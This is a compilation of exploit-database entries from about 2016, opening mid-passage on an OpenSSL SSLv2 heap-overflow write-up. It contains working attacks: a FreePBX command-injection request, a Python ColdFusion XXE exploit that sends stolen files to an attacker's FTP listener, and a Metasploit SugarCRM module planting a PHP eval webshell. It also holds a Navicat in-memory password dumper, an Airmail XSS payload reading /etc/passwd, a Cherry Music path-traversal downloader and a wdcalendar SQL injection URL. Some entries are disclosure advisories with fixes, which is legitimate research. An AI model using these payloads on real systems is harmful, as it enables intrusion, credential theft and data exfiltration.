The next allocated chunk is a 16 bytes chunk which holds a
STACK_OF(SSL_CIPHER) structure. This chunk is also allocated from the
beginning of the 'top' chunk, so it's located right above the SSL_SESSION
structure. The address of this chunk is stored in the session->ciphers
variable.
If we're lucky, the memory would look like this:
| top chunk |
|-----------|
session->ciphers | 16 bytes | <- STACK_OF(SSL_CIPHER) structure
points here -> |-----------|
| 368 bytes | <- SSL_SESSION structure
|-----------|
We can read the session->ciphers pointer from the SSL_SESSION structure
in the SERVER_FINISHED message. By subtracting 368 from it, we'll get
the address of the SSL_SESSION structure, and thus the address of
the data we've overwritten.
---/ fork() Is Your Friend
We'll use the same buffer overflow to get the address of the shellcode
and to overwrite the malloc chunks. The problem is that we need to
know the shellcode address before we send it to the server.
The only solution is to send 2 requests. The first request overwrites
session_id_length and we complete the handshake to get the SERVER_FINISHED
message. Then we adjust our shellcode and open a second connection
which we use to send it.
If we're dealing with a forking server like Apache, the two children
will have an identical memory layout and malloc() will put the
session structure at the same address. Of course, life is never that
simple. Apache children can handle multiple requests, which would
change the memory allocation pattern of the two children we use.
To guarantee that both children are freshly spawned, our exploit
will open a number of connections to the server before sending the
two important requests. These connection should use up all available
Apache children and force new ones to be spawned.
If the server traffic is high, the exploit might fail. If the
memory allocation patterns are different, the exploit might fail.
If you have a wrong GOT address, the exploit will definitely fail.
---------[ How Does openssl-too-open Work? ]
openssl-scanner overflows the master_key_length, master_key[] and session_id_length
variables in the SSL_SESSION structure. The first two are uninitialized at this point,
so overwriting them has no effect on openssl. The first place where the session_id_length
variable is used after we overwrite it is in session_finish() (ssl/s2_srvr.c:847)
memcpy(p,s->session->session_id, (unsigned int)s->session->session_id_length);
This data is returned in the SERVER_FINISHED packet. openssl-scanner checks the length
of the data. If it matches the value we set session_id_length to, then the server is
exploitable.
OpenSSL 0.9.6e and higher versions return
192.160.0.2: Server error: SSL2_PE_UNDEFINED_ERROR (0x00) after KEY_ARG data was sent. Server is not vulnerable.
The updates that most vendors have put out backport the changes from 0.9.6e to 0.9.6b
or some other version of OpenSSL. They don't return an error like 0.9.6e.
The updated RedHat and Debian packages) would close the connection immediatelly
after they receive the oversized KEY_ARG data, causing openssl-scanner to report
192.168.0.1: Connection closed after KEY_ARG data was sent. Server is most likely not vulnerable.
IIS servers exhibit the same behavior.
IIS servers that don't have a certificate set up close the connection as soon as
they receive the CLIENT_HELLO packet. openssl-scanner reports this as
192.168.0.2: Connection unexpectedly closed
/* EOF */
http://www.phreedom.org/solar/exploits/apache-openssl/openssl-too-open.tar.gz
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40347.tar.gz (openssl-too-open.tar.gz)
Vulnerable software : Freepbx
Tested versions : 13.0.x < 13.0.154
vendor : freepbx.org
Author : i-Hmx
Email : n0p1337@gmail.com
Home : sec4ever.com
Knock knock people , Eg-R1z on the mic again . .
Freepbx is vulnerable to unauthenticated remote command execution due to multiple weak inputs validation as well as partial authenticaion bypass
Need more technical shit?!
Here u go
File : /var/www/html/admin/libraries/Composer/vendor/symfony/process/Symfony/Component/Process/Process.php
class Process
{
const ERR = 'err';
const OUT = 'out';
const STATUS_READY = 'ready';
const STATUS_STARTED = 'started';
const STATUS_TERMINATED = 'terminated';
Line 145:
public function __construct($commandline, $cwd = null, array $env = null, $input = null, $timeout = 60, array $options = array())
{
if (!function_exists('proc_open')) {
throw new RuntimeException('The Process class relies on proc_open, which is not available on your PHP installation.');
}
--===>>> $this->commandline = $commandline;
$this->cwd = $cwd;
Line 275
$commandline = $this->commandline;
if ('\\' === DIRECTORY_SEPARATOR && $this->enhanceWindowsCompatibility) {
$commandline = 'cmd /V:ON /E:ON /C "('.$commandline.')';
foreach ($this->processPipes->getFiles() as $offset => $filename) {
$commandline .= ' '.$offset.'>'.ProcessUtils::escapeArgument($filename);
}
$commandline .= '"';
if (!isset($this->options['bypass_shell'])) {
$this->options['bypass_shell'] = true;
}
}
--===>>> $this->process = proc_open($commandline, $descriptors, $this->processPipes->pipes, $this->cwd, $this->env, $this->options);
Class is being called at
File : /var/www/html/admin/libraries/media/Media/Driver/Drivers/SoxShell.php
Line 118
public function convert($newFilename,$extension,$mime) {
switch($extension) {
case "wav":
switch($this->extension) {
case "sln":
$process = new Process($this->binary.' -t raw -s -b 16 -r 8000 '.$this->track.' -r '.$this->options['samplerate'].' -b '.$this->options['bitdepth'].' -c 1 '.$newFilename);
break;
case "sln12":
$process = new Proces.................
case "wav16":
---===>> $process = new Process($this->binary.' '.$this->track.' -t wav -b 16 -r 16000 -c 1 '.$newFilename);
break;
default:
$process = new Process($this->binary.' '.$this->track.' -c 1 '.$newFilename);
break;
}
if(!$this->background) {
---===>> $process->run();
if (!$process->isSuccessful()) {
throw new \RuntimeException($process->getErrorOutput());
}
} else {
$process->start();
if (!$process->isRunning()) {
throw new \RuntimeException($process->getErrorOutput());
}
}
}
Sox shell can be called via multiple parts of the fpbx including the music module
File : admin/modules/music/Music.class.php
Line : 407
$name = $dname . '.' . $extension;
move_uploaded_file($tmp_name, $this->tmp."/".$name);
$media->load($this->tmp."/".$name);
foreach($_POST['codec'] as $c) {
--==>> $media->convert($path."/".$dname.".".$c);
}
unlink($this->tmp."/".$name);
this part can be accessed by unauthenticated user and so it's obvious command execution vulnerable :/
POC :
[root:/lab/fpbx]# curl -i -s -k -X 'POST' \
-H 'User-Agent: sec4ever 1337s' -H 'Referer: http://x.x.x.x/admin/ajax.php' -H 'Content-Type: multipart/form-data; boundary=---------------------------317092200613369' \
--data-binary $'-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"extension\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"language\"\x0d\x0a\x0d\x0aen\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"filename\"\x0d\x0a\x0d\x0afa.wav\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"codec[1]\"\x0d\x0a\x0d\x0agsm\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"id\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"files[1]\"; filename=\"$(id).wav\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0aEg-R1z ruling you ;)\x0d\x0a-----------------------------317092200613369\x0d\x0a\x0d\x0a' \
'http://x.x.x.x/admin/ajax.php?module=music&command=upload'
HTTP/1.1 500 Internal Server Error
Date: Wed, 07 Sep 2016 17:33:02 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.28
Set-Cookie: lang=en_US
Set-Cookie: PHPSESSID=6j9ei3pn1btu2o6jc1j6mngmp4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Ignore-This: 1
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json
{"error":{"type":"RuntimeException","message":"\/usr\/bin\/sox formats: can't open input file `groups=498(asterisk).wav': No such file or directory\n","file":"\/var\/www\/html\/admin\/libraries\/media\/Media\/Driver\/Drivers\/SoxShell.php","line":194}}#
Patching : can be done via adding escapeshellarg to soxshell inputs
Almost fixed in fpbx later versions
# in this version spaces,',`,/,\,<,>,?,&,| are filtered , which can be super easily bypassed
# make a priv8 , burn another ;)
# From Eg-R1z with Love xD
'''
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
- dawid (at) legalhackers.com
- CVE-2016-4264
- APSB16-30
- Release date: 31.08.2016
- Severity: Critical
=============================================
I. VULNERABILITY
-------------------------
Adobe ColdFusion <= 11 XML External Entity (XXE) Injection
II. BACKGROUND
-------------------------
"Adobe ColdFusion 11 Enterprise Edition offers a single platform to
rapidly build and deploy scalable, high-performing web and mobile
applications. Leverage unique capabilities to develop, test, and debug
mobile applications end to end. Generate high-quality PDF files and
manipulate them easily."
http://www.adobe.com/products/coldfusion-family.html
ColdFusion is widely deployed. A google search for a ColdFusion index file
(index.cfm) exposes over 30 million websites of various sectors that make use
of ColdFusion platform in a visible way:
https://www.google.com/?q=inurl:%2Findex.cfm
including various government websites:
https://www.google.com/search?q=inurl:index.cfm+site:gov
III. INTRODUCTION
-------------------------
An independent research revealed that Adobe ColdFusion in versions 11 and below
is vulnerable to XXE Injection when processing untrusted office documents.
Depending on web application's functionality and the attacker's ability to
supply a malicious document to be processed by a vulnerable ColdFusion
application, this vulnerability may potentially be exploited by both
low-privileged and unauthenticated remote attackers.
This vulnerability can allow various attacks including:
- reading arbitrary files (stored on the server and within the network shares)
- listing web/system directories
- SSRF attacks / unauthorized access to restricted services running on the localhost
as well as within the victim's server network
- SMB relay attacks
- temporary file uploads which may be used by attackers in combination with LFI
vulnerabilities to supply malicious code
This advisory provides a PoC exploit that demonstrates how a remote attacker
could read arbitrary files from the target server, as well as list directories.
Ability to read arbitrary files could for example let attackers extract sensitive
information such as ColdFusion password hashes of the management console or stored
database credentials.
This could allow unauthorized access to weakly protected ColdFusion management
interfaces and let attackers upload malicious code which could be used to fully
compromise the server.
IV. DESCRIPTION
-------------------------
The XXE vulnerability was found in the Office Open XML (OOXML) processing
functions which are utilised when opening documents that use XML structure.
Documents that are commonly stored in this format include:
- DOCX (Word documents)
- XLSX (Excel spreadsheets)
- PPTX (PowerPoint presentations)
More information about the format can be found in:
https://en.wikipedia.org/wiki/Office_Open_XML
The vulnerability is caused by an unrestricted XML parser which allows
for external XML entities processing when parsing such document.
Many web applications often accept OOXML documents from their users to process
documents of various purposes, for example:
- invoices
- bank statements
- bills
- tax forms
- inventory
- CVs / cover letters
- application forms
etc.
Such upload functionality is often exposed to low-privileged or even
unauthenticated remote users.
If an attacker is able to upload a specially crafted OOXML document
which is later processed by an application written in Adobe ColdFusion,
they may be able to perform various malicious actions including
arbitrary file reading and directory listing as mentioned in the
introduction.
This could for example be used by malicious users to read sensitive
ColdFusion config files such as:
- neo-security.xml , which stores ColdFusion admin's password hash salt
- password.properties , which stores admin's password hash
- neo-datasource.xml , which stores database credentials
that are stored in c:\ColdFusion11\cfusion\lib\ directory by default on Windows
installations.
Attackers might also access the application sourcecodes within the documentroot:
c:\ColdFusion11\cfusion\wwwroot
or access other sensitive system files available within the system.
As the vulnerability also allows browsing the filesystem and its directories,
attackers may easily find interesting files and ColdFusion config/webroot
directories even if the paths differ from the default ones.
Attackers who have gained access to password hashes could then proceed
to cracking them in order to gain unauthorised access to the databases and
ColdFusion administrator panels to fully compromise the target.
More information on hashes used by ColdFusion 11 can be found in the references
below.
The next section presents a PoC exploit that can be used for file/directory
retrieval.
The exploit will work even if the target ColdFusion application does not return
any data back to the attacker upon processing a malicious document file.
The extracted data will be sent over the network back to the attacker as soon
as the document file is processed.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
An example vulnerable ColdFusion application written in CFML language
which loads a spreadsheet document could look as follows:
---[ vulnerable.cfm ]---
<cfspreadsheet format="csv" action="read" src="#expandPath( 'cf_poc_exploit.xlsx' )#" name="xlsdoc" rows="1-4" />
<cfoutput>#xlsdoc#</cfoutput>
------------------------
For simplicity, this ColdFusion application will load cf_poc_exploit.xlsx
document from the current directory.
In a real-world situation the application would allow a user to upload a
document from their disk or alternatively fetch it from a URL.
Attacker could use the exploit below to prepare a malicious document and
supply it to a vulnerable ColdFusion application.
---[ ./cf_xxe_exploit.py ]---
'''
#!/usr/bin/python
intro = """
(CVE-2016-4264) ColdFusion <= 11 XXE / Arbitrary File Read PoC exploit
This exploit produces a PoC OOXML spreadsheet document with XXE payload that can be
uploaded to a vulnerable ColdFusion application.
It starts up an ftp/data receiver (port 9090) as well as a web server (port 8080)
in order to retrieve an arbitrary file from the victim (upon processing the PoC spreadsheet).
Discovered/Coded by:
Dawid Golunski
http://legalhackers.com
"""
usage = """
Usage:
The exploit requires that you have an external IP and can start web/http listeners on ports
8080/9090 on the attacking machine.
./cf_xxe_exploit.py external_IP 'path_to_fetch'
The example below starts an ftp listener on 192.168.1.40 (port 9090) and web server on 8080
and fetches c:\windows\win.ini file from the target.
./cf_xxe_exploit.py 192.168.1.40 c:/windows/win.ini
The path can also be a directory to retrieve a directory listing e.g:
./cf_xxe_exploit.py 192.168.1.40 c:/
will list the contents of drive C: on Windows
Disclaimer:
For testing purposes only. Do no harm.
Full advisory URL:
http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt
"""
import socket
import subprocess
import sys
import web # http://webpy.org/installation
import threading
import time
# What file to retrieve from the victim server
target_file = "c:/ColdFusion11/cfusion/lib/pass"
# Web server (to serve XML)
external_ip = '192.168.57.10'
web_port = 8080
# File receiver
ftp_port = 9090
timeout=5
# HTTP listener that will return intermediate XML (passdata.xml) in order to establish an ftp connection
class webserver(threading.Thread):
def run (self):
urls = ('/passdata.xml', 'pass_xml')
app = web.application(urls, globals())
#app.run()
return web.httpserver.runsimple( app.wsgifunc(), ('0.0.0.0', web_port))
# Pass data to ftp server using passdata.xml
class pass_xml:
def GET(self):
print xxe_send_payload
# HTTP listener that will return intermediate XML (passdata.xml) in order to establish an ftp connection
class webserver(threading.Thread):
def run (self):
urls = ('/passdata.xml', 'pass_xml')
app = web.application(urls, globals())
#app.run()
return web.httpserver.runsimple( app.wsgifunc(), ('0.0.0.0', web_port))
# Return helper xml/xxe payload to forward data
class pass_xml:
def GET(self):
print "[+] Received GET /passdata.xml web request from the victim (%s) ! TARGET VULNERABLE to XXE !\n" % (web.ctx['ip'])
return xxe_send_payload
def shutdown(code):
print "[+] That's it folks :) Shutting down \n"
web.httpserver.server.interrupt = KeyboardInterrupt()
exit(code)
# [ Main Meat ]
print intro
redirector_started = 0
if len(sys.argv) < 3 :
print usage
sys.exit(2)
# Overwrite settings with parameters from argv[]
external_ip = sys.argv[1]
target_file = sys.argv[2]
print "[+] Setting external IP to '%s' and target path to '%s'\n" % (external_ip, target_file)
# Prepare XXE payloads
#OOXML XXE stub
ooxml_xxe_payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Types [
<!ENTITY % remote SYSTEM "http://_attackerhost_:_webport_/passdata.xml">
%remote;
]>
"""
ooxml_xxe_payload = ooxml_xxe_payload.replace("_attackerhost_", external_ip)
ooxml_xxe_payload = ooxml_xxe_payload.replace("_webport_", str(web_port))
# passdata.xml
xxe_send_payload = """<!ENTITY % file1 SYSTEM "file:///_filepath_">
<!ENTITY % param1 '<!ENTITY % retrfile1 SYSTEM "ftp://cfhack:PoCexploit@_attackerhost_:_ftpport_/%file1;" >' >
%param1;
%retrfile1; """
xxe_send_payload = xxe_send_payload.replace("_filepath_", target_file)
xxe_send_payload = xxe_send_payload.replace("_attackerhost_", external_ip)
xxe_send_payload = xxe_send_payload.replace("_ftpport_", str(ftp_port))
# Create OXML spreadsheet file cf_poc_spreadsheet.xlsx with XXE payload
f = open("[Content_Types].xml", "w")
f.write(ooxml_xxe_payload )
f.close()
cmd = "zip -r cf_poc_spreadsheet.xlsx '[Content_Types].xml' && rm -f '[Content_Types].xml'"
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(result, error) = process.communicate()
rc = process.wait()
if rc != 0:
print "Error: failed to execute command:", cmd
print error
shutdown(3)
print "[+] Successfully created PoC spreadsheet with XXE payload in 'cf_poc_spreadsheet.xlsx' file\n"
print "[+] Starting our web server to serve XML on %s:%s \n" % (external_ip, web_port)
webserver().start()
time.sleep(1)
print '\n[+] Starting FTP/data listener and waiting for connection on %s:%d\n' % (external_ip, ftp_port)
s = socket.socket() # Create/bind socket
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((external_ip, ftp_port))
print "[*] Upload the 'cf_poc_spreadsheet.xlsx' spreadsheet document to the target ColdFusion app now...\n"
s.listen(5) # Wait for the victim to connect
c, addr = s.accept() # Establish connection with the victim
print '\n[+] Got a connection from ', addr, " to our FTP/data server. Meaning juicy data is on the way! :)\n"
c.send("220 Welcome to ColdFusion XXE PoC exploit server\n")
print '[+] Receiving data from the victim...\n'
downloaded = ""
while True:
data = ""
c.settimeout(timeout)
try:
data = c.recv(1024)
except socket.timeout:
print "Timeout ! No more data\n"
break
# extract data
if data.startswith("CWD "):
downloaded = downloaded + data[4:]
if data.startswith("RETR "):
downloaded = downloaded + data[5:]
print "Received packet: " + data
#sys.stdout.write('.')
#sys.stdout.flush()
if "USER" in data:
c.send("331 password needed\n")
elif "RETR" in data:
c.send("550 No such file or directory.\n")
break
else:
c.send('230 continue\n')
# Results
print "\n\n[+] Here's the retrieved contents of the target file/directory (%s) : \n\n%s\n" % (target_file, downloaded)
# shutdown
c.close() # Close the connection
s.shutdown(0)
s.close()
shutdown(0)
'''
-------------[eof]-----------
You can see the exploit in action in a PoC video at:
http://legalhackers.com/videos/ColdFusion-XXE-PoC-Exploit
There are also two examples below:
A) Reading c:/ColdFusion11/cfusion/lib/neo-security.xml file which contains admin hash salt:
root@trusty:~/exploit# ./cf_xxe_exploit.py 192.168.57.10 c:/ColdFusion11/cfusion/lib/neo-security.xml
(CVE-2016-4264) ColdFusion <= 11 XXE / Arbitrary File Read PoC exploit
This exploit produces a PoC OOXML spreadsheet document with XXE payload that can be
uploaded to a vulnerable ColdFusion application.
It starts up an ftp/data receiver (port 9090) as well as a web server (port 8080)
in order to retrieve an arbitrary file from the victim (upon processing the PoC spreadsheet).
Discovered/Coded by:
Dawid Golunski
http://legalhackers.com
[+] Setting external IP to '192.168.57.10' and target path to 'c:/ColdFusion11/cfusion/lib/neo-security.xml'
[+] Successfully created PoC spreadsheet with XXE payload in 'cf_poc_spreadsheet.xlsx' file
[+] Starting our web server to serve XML on 192.168.57.10:8080
http://0.0.0.0:8080/
[+] Starting FTP/data listener and waiting for connection on 192.168.57.10:9090
[*] Upload the 'cf_poc_spreadsheet.xlsx' spreadsheet document to the target ColdFusion app now...
[+] Received GET /passdata.xml web request from the victim (192.168.57.21) ! TARGET VULNERABLE to XXE !
192.168.57.21:57219 - - [31/Aug/2016 20:12:06] "HTTP/1.1 GET /passdata.xml" - 200 OK
[+] Got a connection from ('192.168.57.21', 57220) to our FTP/data server. Meaning juicy data is on the way! :)
[+] Receiving data from the victim...
Received packet: USER cfhack
Received packet: PASS PoCexploit
Received packet: TYPE I
Received packet: CWD <wddxPacket version='1.0'><header
[cut]
[+] Here's the retrieved contents of the target file/directory (c:/ColdFusion11/cfusion/lib/neo-security.xml) :
<wddxPacket version='1.0'><header
[cut]
struct><
var><var name='admin.userid.root.salt'><string>A54B28011C6AC37F4D65B7D608D40722DAD6CDF25A943C809492637D2CC6265F<
string><
var><var name='rds.enabled'><string>false<
[cut]
[+] That's it folks :) Shutting down
~~~~~~~~~~~~
B) Listing the contents of the c:/ColdFusion11/ directory:
root@trusty:~/exploit# ./cf_xxe_exploit.py 192.168.57.10 c:/ColdFusion11/
[cut]
[+] Setting external IP to '192.168.57.10' and target path to 'c:/ColdFusion11/'
[+] Successfully created PoC spreadsheet with XXE payload in 'cf_poc_spreadsheet.xlsx' file
[+] Starting our web server to serve XML on 192.168.57.10:8080
http://0.0.0.0:8080/
[+] Starting FTP/data listener and waiting for connection on 192.168.57.10:9090
[*] Upload the 'cf_poc_spreadsheet.xlsx' spreadsheet document to the target ColdFusion app now...
[+] Received GET /passdata.xml web request from the victim (192.168.57.21) ! TARGET VULNERABLE to XXE !
192.168.57.21:57245 - - [31/Aug/2016 20:14:06] "HTTP/1.1 GET /passdata.xml" - 200 OK
[+] Got a connection from ('192.168.57.21', 57246) to our FTP/data server. Meaning juicy data is on the way! :)
[+] Receiving data from the victim...
Received packet: USER cfhack
Received packet: RETR Adobe_ColdFusion_11_Install_08_30_2016_19_59_04.log
cf_app.ico
[cut]
[+] Here's the retrieved contents of the target file/directory (c:/ColdFusion11/) :
Adobe_ColdFusion_11_Install_08_30_2016_19_59_04.log
cf_app.ico
cfusion
config
jre
license.html
Readme.htm
uninstall
[+] That's it folks :) Shutting down
VI. BUSINESS IMPACT
-------------------------
The vulnerability can be abused by low-privileged or unauthenticated remote
attackers depending on application's functionality and lead to sensitive
information disclosure. It can allow attackers to read arbitrary files or
expose internal services running on the server and within the local network.
Attackers could for example read stored password hashes or database credentials
which may aid attackers with gaining access to ColdFusion admin interface.
Extracting application sourcecodes could also be of use to attackers and help
them to find other vulnerabilities to fully compromise an affected target.
VII. SYSTEMS AFFECTED
-------------------------
ColdFusion installations before:
- ColdFusion 11 Update 10
- ColdFusion 10 Update 21
are affected by this vulnerability.
VIII. SOLUTION
-------------------------
Update to ColdFusion 11 Update 10 which include critical hotfixes released by
the vendor upon initial private disclosure to Adobe. Alternatively users can
upgrade their installation to ColdFusion 2016 which is not affected.
The vulnerability fix/advisory has been assigned APSB16-30 id by Adobe.
Links to the critical Adobe hotfix patches can be found in the references below.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt
http://legalhackers.com/exploits/cf_xxe_exploit_CVE-2016-4264.py
PoC exploit video:
http://legalhackers.com/videos/ColdFusion-XXE-PoC-Exploit
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4264
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4264
Adobe ColdFusion critical hotfix/vuln announcement:
https://helpx.adobe.com/security/products/coldfusion/apsb16-30.html
Info on ColdFusion configs and used hashes:
http://www.openwall.com/lists/john-users/2015/06/07/1
https://helpx.adobe.com/coldfusion/kb/purpose-location-xml-configuration-files.html
https://blogs.adobe.com/psirt/?p=1395
http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers
Lockdown guides:
http://www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/cf11/cf11-lockdown-guide.pdf
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
31.08.2016 - advisory released
01.09.2016 - corrections applied
07.09.2016 - added PoC video
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'SugarCRM REST Unserialize PHP Code Execution',
'Description' => %q{
This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23
which could be abused to allow unauthenticated users to execute arbitrary PHP code with
the permissions of the webserver. The dangerous unserialize() call exists in the
'/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct()
method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.
},
'Author' => 'EgiX',
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://karmainsecurity.com/KIS-2016-07'],
['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-001'],
['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-008'],
['URL', 'https://bugs.php.net/bug.php?id=72663']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['SugarCRM CE <= 6.5.23', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 23 2016'
))
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"])
], self.class)
end
def exploit
upload_php = '/custom/' + rand_text_alpha(rand(4)+8) + '.php'
payload_serialized = "O:+14:\"SugarCacheFile\":23:{S:17:\"\\00*\\00_cacheFileName\";"
payload_serialized << "s:#{upload_php.length+2}:\"..#{upload_php}\";S:16:\"\\00*\\00"
payload_serialized << "_cacheChanged\";b:1;S:14:\"\\00*\\00_localStore\";a:1:{i:0;s:55"
payload_serialized << ":\"<?php eval(base64_decode($_SERVER['HTTP_PAYLOAD'])); ?>\";}}"
print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'service/v4/rest.php'),
'method' => 'POST',
'vars_post' => {
'method' => 'login',
'input_type' => 'Serialize',
'rest_data' => payload_serialized
}
})
if not res or res.code != 200
print_error("#{peer} - Exploit failed: #{res.code}")
return
end
register_files_for_cleanup(File.basename(upload_php))
print_status("#{peer} - Executing the payload #{upload_php}")
res = send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, upload_php),
'headers' => { 'payload' => Rex::Text.encode_base64(payload.encoded) }
})
if res and res.code != 200
print_error("#{peer} - Payload execution failed: #{res.code}")
return
end
end
end
#####
# Navicat Premium 11.2.11 (64bit) Local Password Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://www.navicat.com/
# Date 05/09/2016
# Bug Discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
#
# http://www.black-rose.ml
#
# Special Thanks & Greetings to friend of mine Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
#####
# Navicat Premium client v11.2.11 is vulnerable to local password disclosure, the supplied password is stored in a plaintext format in memory process.
# A potential attacker could reveal the supplied password in order to gain access to the database.
# Proof-Of-Concept Code:
#####
import time
from winappdbg import Debug, Process
count = 0
found = 0
filename = "navicat.exe"
process_pid = 0
memory_dump = []
def b2h(str):
return ''.join(["%02X " % ord(x) for x in str]).strip()
def h2b(str):
bytes = []
str = ''.join(str.split(" "))
for i in range(0, len(str), 2):
bytes.append(chr(int(str[i:i+2], 16)))
return ''.join(bytes)
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x00\x90\x18\x00\x00\x00\x00\x00\x00\x00'):
memory_dump.append(process.read(address,30))
memory_dump.pop(0)
for i in range(len(memory_dump)):
str = b2h(memory_dump[i])
first = str.split("00 90 18 00 00 00 00 00 00 00 ")[1]
last = first.split("00 ")
if last[0]:
count = count+1
found = 1
print "[+] Password for connection #%d found as %s" % (count, h2b(last[0]))
if found == 0:
print "[-] Password not found! Make sure the client is connected at least to one database."
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
Airmail is a popular email client on iOS and OS X.
I found a vulnerability in airmail of the latest version which could cause
a file:// xss and arbitrary file read.
Author: redrain, yu.hong@chaitin.com
Date: 2016-08-15
Version: 3.0.2 and earlier
Platform: OS X and iOS
Site: http://airmailapp.com/
Vendor: http://airmailapp.com/
Vendor Notified: 2016-08-15
Vulnerability:
There is a file:// xss in airmail version 3.0.2 and earlier.
The app can deal the URLscheme render with link detection, any user can
edit the email content in reply with the evil code with the TL;DR.
Airmail implements its user interface using an embedded version of WebKit,
furthermore Airmail on OS X will render any URI as a clickable HTML <a
href= link. An attacker can create a simple JavaScript URI (e.g.,
javascript:) which when clicked grants the attacker initial JavaScript
execution (XSS) in the context of the application DOM.
PoC:
javascript://www.baidu.com/research?%0Aprompt(1)
a
Arbitrary file read:
javascript://www.baidu.com/research?%0Afunction%20reqListener%20()%20%7B%0A%
20%20prompt(this.responseText)%3B%0A%7D%0Avar%20oReq%20%3D%
20new%20XMLHttpRequest()%3B%0AoReq.addEventListener(%
22load%22%2C%20reqListener)%3B%0AoReq.open(%22GET%22%2C%
20%22file%3A%2F%2F%2Fetc%2Fpasswd%22)%3B%0AoReq.send()%3B
# Exploit Title: Cherry Music v0.35.1 directory traversal vulnerability allows authenticated users to download arbitrary files
# Date: 11-09-2016
# Exploit Author: feedersec
# Contact: feedersec@gmail.com
# Vendor Homepage: http://www.fomori.org/cherrymusic/index.html
# Software Link: http://www.fomori.org/cherrymusic/versions/cherrymusic-0.35.1.tar.gz
# Version: 0.35.1
# Tested on: ubuntu 14.04 LTS
# CVE : CVE-2015-8309
import urllib2, cookielib, urllib
#set parameters here
username = 'admin'
password = 'Password01'
baseUrl = 'http://localhost:8080/'
targetFile = '/etc/passwd'
downloadFileName = 'result.zip'
####
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
params = urllib.urlencode({'username': username, 'password': password, 'login': 'login'})
req = urllib2.Request(baseUrl, params)
response = opener.open(req)
for c in cj:
if c.name == "session_id":
session_id = c.value
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders.append(('Cookie', 'session_id=' + session_id))
params = urllib.urlencode({'value': '["' + targetFile + '"]'})
request = urllib2.Request(baseUrl + "download", params)
response = opener.open(request).read()
with open(downloadFileName, 'wb') as zipFile:
zipFile.write(response)
# Exploit Title: wdcalendar version 2 sql injection vulnerability
# Google Dork: allinurl:"wdcalendar/edit.php"
# Date: 12/09/2016
# Exploit Author: Alfonso Castillo Angel
# Software Link: https://github.com/ronisaha/wdCalendar
# Version: Version 2
# Tested on: Windows 7 ultimate
# Category: webapps
* Affected file -> edit.php and edit.db.php
* Exploit ->
http://localhost/wdcalendar/edit.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9--
* Vulnerable code:
function getCalendarByRange($id){
try{
$db = new DBConnection();
$db->getConnection();
$sql = "select * from `jqcalendar` where `id` = " . $id; //the
variable is not filtered properly
$handle = mysql_query($sql);
//echo $sql;
$row = mysql_fetch_object($handle);
